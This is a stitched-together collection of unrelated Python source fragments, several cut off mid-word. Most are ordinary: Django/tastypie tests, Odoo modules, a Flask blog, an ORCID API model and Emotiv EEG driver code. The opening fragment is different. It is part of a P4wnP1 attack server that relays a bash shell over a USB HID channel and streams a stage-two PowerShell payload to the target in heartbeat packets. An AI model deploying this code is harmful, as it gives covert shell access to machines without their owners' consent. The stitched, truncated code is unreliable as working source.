buf = "" else: buf += byte # As we don't pipe CTRL+C intterupt from client through # HID data stream, there has to be another option to reset the bash process if it stalls # This could easily happen, as we don't support interactive commands, waiting for input # (this non-interactive shell restriction should be a known hurdle to every pentester out there) def reset_bash(subproc): bash = subproc[0] bash.stdout.close() bash.kill() send_datastream(qout, 3, 3, "Bash process terminated") bash = subprocess.Popen(["bash"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) subproc[0] = bash if bash.poll() == None: send_datastream(qout, 3, 3, "New bash process started") else: send_datastream(qout, 3, 3, "Restarting bash failed") # prepare a stream to answer a getfile request def stream_from_getfile(filename): with open(filename,"rb") as f: content = f.read() return content # main code qout = Queue.Queue() qin = Queue.Queue() fragment_assembler = {} bash = subprocess.Popen(["bash"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) subproc = [bash] # packed into array to allow easy "call by ref" # process input thread.start_new_thread(process_input, (qin, subproc)) # process output thread.start_new_thread(process_bash_output, (qout, subproc)) # process error thread.start_new_thread(process_bash_error, (qout, subproc)) # Initialize stage one payload, carried with heartbeat package in endless loop with open("stage2.ps1","rb") as f: stage2=f.read() #initial_payload="#Hey this is the test data for an initial payload calling get-date on PS\nGet-Date" stage2_chunks = chunks(stage2) heartbeat_content = [] heartbeat_content += ["begin_heartbeat"] heartbeat_content += stage2_chunks heartbeat_content += ["end_heartbeat"] heartbeat_counter = 0 with open("/dev/hidg1","r+b") as f: # send test data stream send_datastream(qout, 1, 1, "Hello from P4wnP1, this message has been sent through a HID device") while True: packet = read_packet(f) src = packet[0] dst = packet[1] snd = packet[2] rcv = packet[3] msg = packet[4] # put packet to input queue fragment_rcvd(qin, fragment_assembler, src, dst, msg) #print "Packet received" #print "SRC: " + str(src) + " DST: " + str(dst) + " SND: " + str(snd) + " RCV: " + str(rcv) #print "Payload: " + repr(msg) # send data from output queue (empty packet otherwise) if qout.empty(): # empty keep alive (rcv field filled) #send_packet(f=f, src=0, dst=0, data="", rcv=snd) # as the content "keep alive" packets (src=0, dst=0) is ignored # by the PowerShell client, we use them to carry the initial payload # in an endless loop if heartbeat_counter == len(heartbeat_content): heartbeat_counter = 0 send_packet(f=f, src=
bundle_5 = Bundle(data={'time': None}) field_5 = TimeField(attribute='created', null=True) field_5.instance_name = 'time' self.assertEqual(field_5.hydrate(bundle_5), None) class DateFieldTestCase(TestCase): fixtures = ['note_testdata.json'] def test_init(self): field_1 = CharField() self.assertEqual(field_1.help_text, 'Unicode string data. Ex: "Hello World"') field_2 = CharField(help_text="Custom.") self.assertEqual(field_2.help_text, 'Custom.') def test_dehydrated_type(self): field_1 = DateField() self.assertEqual(field_1.dehydrated_type, 'date') def test_dehydrate(self): note = Note.objects.get(pk=1) bundle = Bundle(obj=note) field_1 = DateField(attribute='created') self.assertEqual(field_1.dehydrate(bundle), aware_datetime(2010, 3, 30, 20, 5)) field_2 = DateField(default=datetime.date(2010, 4, 1)) self.assertEqual(field_2.dehydrate(bundle), datetime.date(2010, 4, 1)) note.created_string = '2010-04-02' field_3 = DateField(attribute='created_string') self.assertEqual(field_3.dehydrate(bundle), datetime.date(2010, 4, 2)) def test_hydrate(self): bundle_1 = Bundle(data={ 'date': '2010-05-12', }) field_1 = DateField(attribute='created') field_1.instance_name = 'date' self.assertEqual(field_1.hydrate(bundle_1), datetime.date(2010, 5, 12)) bundle_2 = Bundle() field_2 = DateField(default=datetime.date(2010, 4, 1)) field_2.instance_name = 'date' self.assertEqual(field_2.hydrate(bundle_2), datetime.date(2010, 4, 1)) bundle_3 = Bundle(data={ 'date': 'Wednesday, May 12, 2010', }) field_3 = DateField(attribute='created_string') field_3.instance_name = 'date' self.assertEqual(field_3.hydrate(bundle_3), datetime.date(2010, 5, 12)) bundle_4 = Bundle(data={ 'date': '5 Apr 2010', }) field_4 = DateField(attribute='created') field_4.instance_name = 'date' self.assertEqual(field_4.hydrate(bundle_4), datetime.date(2010, 4, 5)) bundle_5 = Bundle(data={ 'date': None, }) field_5 = DateField(attribute='created', null=True) field_5.instance_name = 'date' self.assertEqual(field_5.hydrate(bundle_5), None) def test_model_resource_correct_association(self): api_field = ModelResource.api_field_from_django_field(models.DateField()) self.assertEqual(api_field, DateField) class DateTimeFieldTestCase(TestCase): fixtures = ['note_testdata.json'] def test_init(self): field_1 = CharField() self.assertEqual(field_1.help_text, 'Unicode string data. Ex: "Hello World"') field_2 = CharField(help_text="Custom.") self.assertEqual(field_2.help_text, 'Custom.') def test_dehydrated_type(self): field_1 = DateTimeField() self.assertEqual(field_1.dehydrated_type, 'datetime') def test_dehydrate(self): note = Note.objects.get(pk=1) bundle = Bundle(obj=note) field_1 = DateTimeField(attribute='created') self.assertEqual(field_1.dehydrate(bundle), aware_datetime(2010, 3, 30, 20, 5)) field_2 = DateTimeField(default=aware_datetime(2010, 4, 1, 1, 7)) self.assertEqual(field_2.dehydrate(bundle), aware_datetime(2010, 4, 1, 1, 7)) note.created_string = '2010-04-02 01:11:00' field_3 = DateTimeField(attribute='created_string') self.assertEqual(field_3.dehydrate(bundle), aware_datetime(2010, 4, 2, 1, 11)) def test_hydrate(self): bundle_1 = Bundle(data={ 'datetime': '2010-05-12 10:36:28', }) field_1 = DateTimeField(attribute='created') field_1.instance_name = 'datetime' self.assertEqual(field_1.hydrate(bundle_1), aware_datetime(2010, 5, 12, 10, 36, 28)) bundle_2 = Bundle() field_2 = DateTimeField(default=aware_datetime(2010, 4, 1, 2, 0)) field_2.instance_name = 'datetime' self.assertEqual(field_2.hydrate(bundle_2), aware_datetime(2010, 4, 1, 2, 0)) bundle_3 = Bundle(data={ 'datetime': 'Tue, 30 Mar 2010 20:05:00 -0500', }) field_3 = DateTimeField(attribute='created_string') field_3.instance_name = 'datetime' self.assertEqual(field_3.hydrate(bundle_3), aware_datetime(2010, 3, 30, 20, 5, tzinfo=tzoffset(None, -18000))) bundle_4 = Bundle(data={ 'datetime': None, }) field_4 = DateField(attribute='created', null=True) field_4.instance_name = 'datetime' self.assertEqual(field_4.hydrate(bundle_4), None) bundle_5 = Bundle(data={'datetime': 'foo'}) field_5 = DateTimeField() field_5.instance_name = 'datetime' self.assertRaises(ApiFieldError, field_5.hydrate, bundle_5) bundle_6 = Bundle(data={'datetime': ['a', 'list', 'used', 'to', 'crash']}) field_6 = DateTimeField() field_6.instance_name = 'datetime' self.assertRaises(ApiFieldError, field_6.hydrate, bundle_6) def test_model_resource_correct_association(self): api_field = ModelResource.api_field_from_django_field(models.DateTimeField()) self.assertEqual(api_field, DateTimeField) class UserResource(ModelResource): class Meta: resource_name = 'users' queryset = User.objects.all() def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'): if bundle_or_obj is None: return '/api/v1/users/' return '/api/v1/users/%s/' % bundle_or_obj.obj.id class ToOneFieldTestCase(TestCase): fixtures = ['note_testdata.json'] def test_init(self): field_1 = ToOneField(UserResource, 'author') self.assertEqual(field_1.instance_name, None) self.assertEqual(issubclass(field_1.to, UserResource), True) self.assertEqual(field_1.attribute, 'author') self.assertEqual(field_1.related_name, None) self.assertEqual(field_1.null, False) self.assertEq
ual(field_1.full, False) self.assertEqual(field_1.readonly, False) self.assertEqual(field_1.help_text, 'A single related resource. Can
be either a URI or set of nested resource data.') field_2 = ToOneField(UserResource, 'author', null=True, help_text="Points to a User.") self.assertEqual(field_2.instance_name, None) self.assertEqual(issubclass(field_2.to, UserResource), True) self.assertEqual(field_2.attribute, 'author') self.assertEqual(field_2.related_name, None) self.assertEqual(field_2.null, True) self.assertEqual(field_2.full, False) self.assertEqual(field_2.readonly, False) self.assertEqual(field_2.help_text, 'Points to a User.') field_3 = ToOneField(UserResource, 'author', default=1, null=True, help_text="Points to a User.") self.assertEqual(field_3.instance_name, None) self.assertEqual(issubclass(field_3.to, UserResource), True) self.assertEqual(field_3.attribute, 'author') self.assertEqual(field_3.related_name, None) self.assertEqual(field_3.null, True) self.assertEqual(field_3.default, 1) self.assertEqual(field_3.full, False) self.assertEqual(field_3.readonly, False) self.assertEqual(field_3.help_text, 'Points to a User.') field_4 = ToOneField(UserResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.") self.assertEqual(field_4.instance_name, None) self.assertEqual(issubclass(field_4.to, UserResource), True) self.assertEqual(field_4.attribute, 'author') self.assertEqual(field_4.related_name, None) self.assertEqual(field_4.null, True) self.assertEqual(field_4.default, 1) self.assertEqual(field_4.full, False) self.assertEqual(field_4.readonly, True) self.assertEqual(field_4.help_text, 'Points to a User.') field_5 = ToOneField(UserResource, 'author', defa
# -*- coding: utf-8 -*- from south.utils import datetime_utils as datetime from south.db import db from south.v2 import DataMigration from django.db import models from django.contrib.gis.geos import geometry from PIL import Image from PIL.ExifTags import TAGS from ..util import point_from_exif class Migration(DataMigration): def forwards(self, orm): for photo in orm['photomap.Photo'].objects.all(): photo.location = point_from_exif(photo.image.path) photo.save() def backwards(self, orm): raise NotImplementedError('Too lazy to write a method to write the' ' coordinates to the EXIF of the files') models
= { u'photomap.photo': { 'Meta': {'object_name': 'Photo'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100
'}), 'location': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True'}) } } complete_apps = ['photomap'] symmetrical = True
#Licensed to the Apache Software Foundation (ASF) under one #or more contributor license agreements. See the NOTICE file #distributed with this work for additional information #regarding copyright ownership. The ASF licenses this file #to you under the Apache License, Version 2.0 (the #"License"); you may not use this file except in compliance #with the License. You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 #Unless required by applicable law or agreed to in writing, software #distributed under the License is distributed on an "AS IS" BASIS, #WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #See the License for the specific language governing
permissions and #limitations under the License. """Gold Allocation Manager Implementation""" # -*- python -*- import sys, httplib import sha, base64, hmac import xml.dom.minidom from hodlib.Common.util import * class goldAllocationManager: def __init__(self, cfg, log): self.__GOLD_SEC
RET_KEY_FILE = cfg['auth-file'] (self.__goldHost, self.__goldPort) = (cfg['allocation-manager-address'][0], cfg['allocation-manager-address'][1]) self.cfg = cfg self.log = log def getQuote(self, user, project, ignoreErrors=True): # Get Secret Key from File secret = '' try: secretFile = open(self.__GOLD_SECRET_KEY_FILE) secret = secretFile.readline() except Exception, e: self.log.error("Unable to open file %s" % self.__GOLD_SECRET_KEY_FILE) self.log.debug(get_exception_string()) return (ignoreErrors or False) secretFile.close() secret = secret.rstrip() # construct the SSRMAP request body body = '<Body><Request action="Quote" actor="hod"><Object>Job</Object><Data><Job><ProjectId>%s</ProjectId><UserId>%s</UserId><WallDuration>10</WallDuration></Job></Data></Request></Body>' % (project, user) # compute digest message = sha.new() message.update(body) digest = message.digest() digestStr = base64.b64encode(digest) # compute signature message = hmac.new(secret, digest, sha) signatureStr = base64.b64encode(message.digest()) # construct the SSSRMAP Message sssrmapRequest = '<?xml version="1.0" encoding="UTF-8"?>\ <Envelope>%s<Signature><DigestValue>%s</DigestValue><SignatureValue>%s</SignatureValue><SecurityToken type="Symmetric"></SecurityToken></Signature></Envelope>' % (body, digestStr, signatureStr) self.log.info('sssrmapRequest: %s' % sssrmapRequest) try: # post message to GOLD server webservice = httplib.HTTP(self.__goldHost, self.__goldPort) webservice.putrequest("POST", "/SSSRMAP3 HTTP/1.1") webservice.putheader("Content-Type", "text/xml; charset=\"utf-8\"") webservice.putheader("Transfer-Encoding", "chunked") webservice.endheaders() webservice.send("%X" % len(sssrmapRequest) + "\r\n" + sssrmapRequest + '0\r\n') # handle the response statusCode, statusmessage, header = webservice.getreply() responseStr = webservice.getfile().read() self.log.debug("httpStatusCode: %d" % statusCode) self.log.info('responseStr: %s' % responseStr) # parse XML response if (statusCode == 200): responseArr = responseStr.split("\n") responseBody = responseArr[2] try: doc = xml.dom.minidom.parseString(responseBody) responseVal = doc.getElementsByTagName("Value")[0].firstChild.nodeValue self.log.info("responseVal: %s" % responseVal) if (responseVal == 'Success'): return True else: return False except Exception, e: self.log.error("Unable to parse GOLD responseBody XML \"(%s)\" to get responseVal" % (responseBody)) self.log.debug(get_exception_string()) return (ignoreErrors or False) else: self.log.error("Invalid HTTP statusCode %d" % statusCode) except Exception, e: self.log.error("Unable to POST message to GOLD server (%s, %d)" % (self.__goldHost, self.__goldPort)) self.log.debug(get_exception_string()) return (ignoreErrors or False) return True
"""Tests for two-process terminal frontend Currently only has the most simple test possible, starting a console and running a single command. Authors: * Min RK """ #----------------------------------------------------------------------------- # Imports #---------------------------------------
-------------------------------------- import sys import time import nose.tools as nt from nose import SkipTest import IPython.testing.tools as tt from IPython.testing import decorators as dec from IPython.utils import py3compat #--
--------------------------------------------------------------------------- # Tests #----------------------------------------------------------------------------- @dec.skip_win32 def test_console_starts(): """test that `ipython console` starts a terminal""" from IPython.external import pexpect args = ['console', '--colors=NoColor'] # FIXME: remove workaround for 2.6 support if sys.version_info[:2] > (2,6): args = ['-m', 'IPython'] + args cmd = sys.executable else: cmd = 'ipython' try: p = pexpect.spawn(cmd, args=args) except IOError: raise SkipTest("Couldn't find command %s" % cmd) # timeout after one minute t = 60 idx = p.expect([r'In \[\d+\]', pexpect.EOF], timeout=t) p.sendline('5') idx = p.expect([r'Out\[\d+\]: 5', pexpect.EOF], timeout=t) idx = p.expect([r'In \[\d+\]', pexpect.EOF], timeout=t) # send ctrl-D;ctrl-D to exit p.sendeof() p.sendeof() p.expect([pexpect.EOF, pexpect.TIMEOUT], timeout=t) if p.isalive(): p.terminate() def test_help_output(): """ipython console --help-all works""" tt.help_all_output_test('console')
# coding: utf-8 """ ORCID Member No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501 OpenAPI spec version: Latest Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six from orcid_api_v3.models.subtitle_v30_rc2 import SubtitleV30Rc2 # noqa: F401,E501 from orcid_api_v3.models.title_v30_rc2 import TitleV30Rc2 # noqa: F401,E501 from orcid_api_v3.models.translated_title_v30_rc2 import TranslatedTitleV30Rc2 # noqa: F401,E501 class WorkTitleV30Rc2(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'title': 'TitleV30Rc2', 'subtitle': 'SubtitleV30Rc2', 'translated_title': 'TranslatedTitleV30Rc2' } attribute_map = { 'title': 'title', 'subtitle': 'subtitle', 'translated_title': 'translated-title' } def __init__(self, title=None, subtitle=None, translated_title=None): # noqa: E501 """WorkTitleV30Rc2 - a model defined in Swagger""" # noqa: E501 self._title = None self._subtitle = None self._translated_title = None self.discriminator = None if title is not None: self.title = title if subtitle is not None: self.subtitle = subtitle if translated_title is not None: self.translated_title = translated_title @property def title(self): """Gets the title of this WorkTitleV30Rc2. # noqa: E501 :return: The title of this WorkTitleV30Rc2. # noqa: E501 :rtype: TitleV30Rc2 """ return self._title @title.setter def title(self, title): """Sets the title of this WorkTitleV30Rc2. :param title: The title of this WorkTitleV30Rc2. # noqa: E501 :type: TitleV30Rc2 """ self._title = title @property def subtitle(self): """Gets the subtitle of this WorkTitleV30Rc2. # noqa: E501 :return: The subtitle of this WorkTitleV30Rc2. # noqa: E501 :rtype: SubtitleV30Rc2 """ return self._subtitle @subtitle.setter def subtitle(self, subtitle): """Sets the subtitle of this WorkTitleV30Rc2. :param subtitle: The subtitle of this WorkTitleV30Rc2. # noqa: E501 :type: SubtitleV30Rc2 """ self._subtitle = subtitle @property def translated_title(self): """Gets the translated_title of this WorkTitleV30Rc2. # noqa: E501 :return: The translated_title of this WorkTitleV30Rc2. # noqa: E501 :rtype: TranslatedTitleV30Rc2 """ return self._translated_title @translated_title.setter def translated_title(self, translated_title): """Sets the translated_title of this WorkTitleV30Rc2. :param translated_title: The translated_title of this WorkTitleV30Rc2. # noqa: E501 :type: TranslatedTitleV30Rc2 """ self._translated_title = translated_title def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = get
attr(self, attr) if isinstance(value, list): result[attr] = list(map
( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(WorkTitleV30Rc2, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, WorkTitleV30Rc2): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
# Copyright 2021 Alfredo de la Fuente - Avanzosc S.L. # License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl). from odoo.tests import common from odoo.tests import tagged @tagged("post_install", "-at_install") class TestNameCodeYearId(common.SavepointCase): @classmethod def setUpClass(cls): super(TestNameCodeYearId, cls).setUpClass() cls.event_obj = cls.env['event.event'] cls.skill_type_lang = cls.env.ref('hr_skills.hr_skill_type_lang') cls.skill_spanish = cls.env.ref('hr_skills.hr_skill_spanish')
cls.skill_filipino = cls.env.ref('hr_skills.hr_skill_filipino') cls.skill_type_lang.skill_language = True cls.skill_spanish.code = 'SP' cls.skill_filipino.code = 'FI' def test_event_name_code_year_id(self): vals = {'name': 'User for event lang level', 'date_begin': '2025-01-06 08:00:00', 'date_end': '2025-01-15 10:00:00',
'lang_id': self.skill_spanish.id} event = self.event_obj.create(vals) name = 'SP-{}-2025'.format(event.id) self.assertEqual(event.name, name) vals = {'date_begin': '2024-01-06 08:00:00', 'lang_id': self.skill_filipino.id} event.write(vals) name = 'FI-{}-2024'.format(event.id) self.assertEqual(event.name, name)
import traceback from sqlalchemy import Column, Boolean, Integer, String, ForeignKey, create_engine from sqlalchemy.orm import relationship, sessionmaker, scoped_session from sqlalchemy.ext.declarative import declarative_base Base = declarative_base() engine = create_engine('sqlite:///bag_of_holding.db') Base.metadata.bind = engine session_factory = sessionmaker(bind=engine) Session = scoped_session(session_factory) sessi
on = Session() class UserManager: def build_db(self): Base.metadata.create_all(engine) def add_user(self, user_name): """ Create a new user :return: """ def remove_user(self, user_name): """ Remove a current user :param user_name: :return: """ def add_user_profile(self, user_name, service_name
): """ Add a service profile to a user_name :param user_name: :param service_name: :return: """ def remove_user_profile(self, user_name, service_id): """ remove a service profile from a user_name :param user_name: :param service_id: :return: """ def add_profile_trait(self, user_name, service_id, trait_name, trait_value): """ Add a trait to a service profile :param user_name: :param service_id: :param trait_name :param trait_value :return: """ def remove_profile_trait(self, user_name, service_id, trait_id): """ Add a trait to a service profile :param user_name: :param service_id: :param trait_id :return: """ class User(Base): __tablename__ = 'users' id = Column(Integer, primary_key=True) name = Column(String) profiles = relationship('UserProfile') def __repr__(self): return '<User(id={})>'.format(self.id) class UserProfile(Base): __tablename__ = 'userprofiles' id = Column(Integer, primary_key=True) service_name = Column(String) service_url = Column(String) profile_id = Column(String) user_id = Column(Integer, ForeignKey('user.id')) def __repr__(self): return '<UserProfile(id={}, service_name={}, service_url={}, profile_id={})>'\ .format(self.id, self.service_name, self.service_url, self.profile_id) class ProfileTrait(Base): __tablename__ = 'profiletraits' id = Column(Integer, primary_key=True) name = Column(String) value = Column(String) def __repr__(self): return '<ProfileTrait(id={}, name={}, value={})>'.format(self.id, self.name, self.value)
def get_encrypted_char(k, ascii_val, ascii_list, limit): diff = k % 26 rotate_val = ascii_val + diff encrypted_char = '' if rotate_val not in ascii_list: rotate_val -= limit for i in ascii_list: rotate_val -= 1 if rotate_val == 0: encrypted_char += chr(i) else: encrypted_char += chr(rotate_val) return encrypted_char def encrypt(s, k): """ a-z : 97-122 A-Z : 65-90 :param s: string to be encrypted :param k: Integer, by which each character is rotated :return: Encrypted string """ lower_ascii_list = [i for i in range(97, 123)] upper_ascii_list = [i for i in range(65, 91)] lower_case_limit = 122 upper_case_limit = 90 encrypted_string = str() for c in s: ascii_val = ord(c) if ascii_val in lower_ascii_list or ascii_val in upper_ascii_list: limit = lower_case_limit ascii_list = lower_a
scii_list if ascii_val in upper_ascii_list: limit = upper_case_limit ascii_list = upper_ascii_list encrypted_string += get_encrypted_char(k, ascii_val, ascii_list, limit) else: encrypted_string += c
return encrypted_string l = raw_input() s = raw_input() k = int(raw_input()) print encrypt(s, k)
# -*- coding: utf-8 -*- # © 2015 Compassion CH (Nicolas Tran) # License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html). from odoo import api, models class AccountPaymentOrder(models.Model): _inherit = 'account.payment.order' @api.multi def open2generated(self): """ Replace action to propose upload SEPA file to FDS. :return: window action """ action = super(Ac
countPaymentOrder, self).open2generated()
if self.payment_method_id.code == 'sepa_credit_transfer': upload_obj = self.env['payment.order.upload.sepa.wizard'] attachment_id = action['res_id'] upload_wizard = upload_obj.create({ 'attachment_id': attachment_id, 'payment_order_id': self.id, }) del action['view_id'] action.update({ 'res_model': upload_obj._name, 'res_id': upload_wizard.id, 'flags': {'initial_mode': 'edit'}, 'attachment_id': attachment_id }) return action
from flask import Blueprint, render_template, redirect, url_for from flask_blog.extensions import mongo from flask_blog.helpers import convertToObj from flask.ext.login import login_re
quired, current_user from forms import PostsForm posts = Blueprint('posts', __name__, template_folder='templates', static_folder='static', static_url_path='/%s' % __name__) @posts.route("/posts") @login_required def list(): posts = mongo.db.posts.find() return render_template('posts_list.html', posts=posts) @posts.route("/
posts/add", methods=['GET', 'POST']) @login_required def add(): form = PostsForm() if form.validate_on_submit(): mongo.db.posts.insert(_add_username(form.data)) return redirect(url_for("posts.list")) return render_template('post_add.html', form=form) @posts.route("/posts/get/<ObjectId:id>") def get(id): post = mongo.db.posts.find_one_or_404(id) return render_template('post_get.html', post=post) @posts.route("/posts/edit/<ObjectId:id>", methods=['GET', 'POST']) @login_required def edit(id): post = mongo.db.posts.find_one_or_404(id) form = PostsForm(obj=convertToObj(**post)) if form.validate_on_submit(): form.populate_obj(convertToObj(**post)) mongo.db.posts.update({'_id': id}, {'$set': form.data} ) return redirect(url_for("posts.list")) return render_template('post_edit.html', form=form, post=post) @posts.route("/posts/delete/<ObjectId:id>") @login_required def delete(id): mongo.db.posts.remove(id) return redirect(url_for("posts.list")) def _add_username(form): post = form post.update({"author": current_user.username}) return post
# copyright 2003-2012 LOGILAB S.A. (Paris, FRANCE), all rights reserved. # contact http://www.logilab.fr/ -- mailto:contact@logilab.fr # # This file is part of Logilab-Common. # # Logilab-Common is free software: you can redistribute it and/or modify it under the # terms of the GNU Lesser General Public License as published by the Free # Software Foundation, either version 2.1 of the License, or (at your option) # any later version. # # Logilab-Common is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # details. # # You should have received a copy of the GNU Lesser General Public License along # with Logilab-Common. If not, see <http://www.gnu.org/licenses/>. """unit tests for selectors mechanism""" from __future__ import with_statement import gc import logging import os.path as osp import sys from operator import eq, lt, le, gt from contextlib import contextmanager logging.basicConfig(level=logging.ERROR) from logilab.common.testlib import TestCase, unittest_main from logilab.common.registry import * class _1_(Predicate): def __call__(self, *args, **kwargs): return 1 class _0_(Predicate):
def __call__(self, *args, **kwargs): return 0 def _2_(*args, **kwargs): return 2 class SelectorsTC(TestCase): def test_basic_and(self): selector = _1_() & _1_() self.assertEqual(selector(None), 2) selector = _1_() & _0_() self.assertEqual(selector(None), 0) selector = _0_() & _1_() self.assertEqual(selector(None), 0) def test_ba
sic_or(self): selector = _1_() | _1_() self.assertEqual(selector(None), 1) selector = _1_() | _0_() self.assertEqual(selector(None), 1) selector = _0_() | _1_() self.assertEqual(selector(None), 1) selector = _0_() | _0_() self.assertEqual(selector(None), 0) def test_selector_and_function(self): selector = _1_() & _2_ self.assertEqual(selector(None), 3) selector = _2_ & _1_() self.assertEqual(selector(None), 3) def test_three_and(self): selector = _1_() & _1_() & _1_() self.assertEqual(selector(None), 3) selector = _1_() & _0_() & _1_() self.assertEqual(selector(None), 0) selector = _0_() & _1_() & _1_() self.assertEqual(selector(None), 0) def test_three_or(self): selector = _1_() | _1_() | _1_() self.assertEqual(selector(None), 1) selector = _1_() | _0_() | _1_() self.assertEqual(selector(None), 1) selector = _0_() | _1_() | _1_() self.assertEqual(selector(None), 1) selector = _0_() | _0_() | _0_() self.assertEqual(selector(None), 0) def test_composition(self): selector = (_1_() & _1_()) & (_1_() & _1_()) self.assertTrue(isinstance(selector, AndPredicate)) self.assertEqual(len(selector.selectors), 4) self.assertEqual(selector(None), 4) selector = (_1_() & _0_()) | (_1_() & _1_()) self.assertTrue(isinstance(selector, OrPredicate)) self.assertEqual(len(selector.selectors), 2) self.assertEqual(selector(None), 2) def test_search_selectors(self): sel = _1_() self.assertIs(sel.search_selector(_1_), sel) csel = AndPredicate(sel, Predicate()) self.assertIs(csel.search_selector(_1_), sel) csel = AndPredicate(Predicate(), sel) self.assertIs(csel.search_selector(_1_), sel) self.assertIs(csel.search_selector((AndPredicate, OrPredicate)), csel) self.assertIs(csel.search_selector((OrPredicate, AndPredicate)), csel) self.assertIs(csel.search_selector((_1_, _0_)), sel) self.assertIs(csel.search_selector((_0_, _1_)), sel) def test_inplace_and(self): selector = _1_() selector &= _1_() selector &= _1_() self.assertEqual(selector(None), 3) selector = _1_() selector &= _0_() selector &= _1_() self.assertEqual(selector(None), 0) selector = _0_() selector &= _1_() selector &= _1_() self.assertEqual(selector(None), 0) selector = _0_() selector &= _0_() selector &= _0_() self.assertEqual(selector(None), 0) def test_inplace_or(self): selector = _1_() selector |= _1_() selector |= _1_() self.assertEqual(selector(None), 1) selector = _1_() selector |= _0_() selector |= _1_() self.assertEqual(selector(None), 1) selector = _0_() selector |= _1_() selector |= _1_() self.assertEqual(selector(None), 1) selector = _0_() selector |= _0_() selector |= _0_() self.assertEqual(selector(None), 0) def test_wrap_selectors(self): class _temp_(Predicate): def __call__(self, *args, **kwargs): return 0 del _temp_ # test weakref s1 = _1_() & _1_() s2 = _1_() & _0_() s3 = _0_() & _1_() gc.collect() self.count = 0 def decorate(f, self=self): def wrapper(*args, **kwargs): self.count += 1 return f(*args, **kwargs) return wrapper wrap_predicates(decorate) self.assertEqual(s1(None), 2) self.assertEqual(s2(None), 0) self.assertEqual(s3(None), 0) self.assertEqual(self.count, 8) @contextmanager def prepended_syspath(path): sys.path.insert(0, path) yield sys.path = sys.path[1:] class RegistryStoreTC(TestCase): def test_autoload(self): store = RegistryStore() store.setdefault('zereg') with prepended_syspath(self.datadir): store.register_objects([self.datapath('regobjects.py'), self.datapath('regobjects2.py')]) self.assertEqual(['zereg'], store.keys()) self.assertEqual(set(('appobject1', 'appobject2', 'appobject3')), set(store['zereg'])) class RegistrableInstanceTC(TestCase): def test_instance_modulename(self): # no inheritance obj = RegistrableInstance() self.assertEqual(obj.__module__, 'unittest_registry') # with inheritance from another python file with prepended_syspath(self.datadir): from regobjects2 import instance, MyRegistrableInstance instance2 = MyRegistrableInstance() self.assertEqual(instance.__module__, 'regobjects2') self.assertEqual(instance2.__module__, 'unittest_registry') if __name__ == '__main__': unittest_main()
# /usr/bin/env python import os # Context manager class cd: """ Context manager f
or safely changing the current working directory """ def __init__(self, newPath): self.newPath = os.path.expanduser(newPath) def __enter__(self): self.savedPath = os.getcwd() os.chdir(self.newPath) def __exit__(self, etype, value, traceback): os.chdir
(self.savedPath)
] = {'buffer_length' : 60.,} info['subdevices'] = [ ] info['subdevices'].append(create_analog_subdevice_param(_channel_names)) quality_name = ['Quality {}'.format(n) for n in _channel_names] info['subdevices'].append(create_analog_subdevice_param(quality_name)) info['subdevices'].append(create_analog_subdevice_param([ 'X','Y'])) return info def dump(obj): for attr in dir(obj): print "obj.%s = %s" % (attr, getattr(obj, attr)) class EmotivMultiSignals(DeviceBase): def __init__(self, **kargs): DeviceBase.__init__(self, **kargs) @classmethod def get_available_devices(cls): devices = OrderedDict() if WINDOWS: try: for device in hid.find_all_hid_devices(): print "device : ", device if (device.product_name == 'Emotiv RAW DATA' or device.product_name == 'EPOC BCI'): devices['Emotiv '+device.serial_number] = get_info(device) finally: pass else: serials = { } for name in os.listdir("/sys/class/hidraw"): realInputPath = os.path.realpath("/sys/class/hidraw/" + name) path = '/'.join(realInputPath.split('/')[:-4]) try: with open(path + "/manufacturer", 'r') as f: manufacturer = f.readline() if "emotiv" in manufacturer.lower(): with open(path + "/serial", 'r') as f: serial
= f.readline().strip() if serial not in serials: serials[serial] = [ ] seri
als[serial].append(name) except IOError as e: print "Couldn't open file: %s" % e for serial, names in serials.items(): device_path = '/dev/'+names[1] info = get_info(device_path) devices['Emotiv '+device_path] = info return devices def configure(self, buffer_length = 60, subdevices = None, ): self.params = {'buffer_length' : buffer_length, 'subdevices' : subdevices, } self.__dict__.update(self.params) self.configured = True def initialize(self): devices = EmotivMultiSignals.get_available_devices() self.device = devices.values()[0] if self.subdevices is None: self.subdevices = self.device['subdevices'] self.sampling_rate = 128. self.packet_size = 1 l = int(self.sampling_rate*self.buffer_length) self.buffer_length = (l - l%self.packet_size)/self.sampling_rate self.name = '{}'.format(self.device['board_name']) self.streams = [ ] for s, sub in enumerate(self.subdevices): stream = self.streamhandler.new_AnalogSignalSharedMemStream(name = self.name+str(s) , sampling_rate = self.sampling_rate, nb_channel = sub['nb_channel'], buffer_length = self.buffer_length, packet_size = self.packet_size, dtype = np.float64, channel_names = sub['by_channel_params']['channel_names'], channel_indexes = 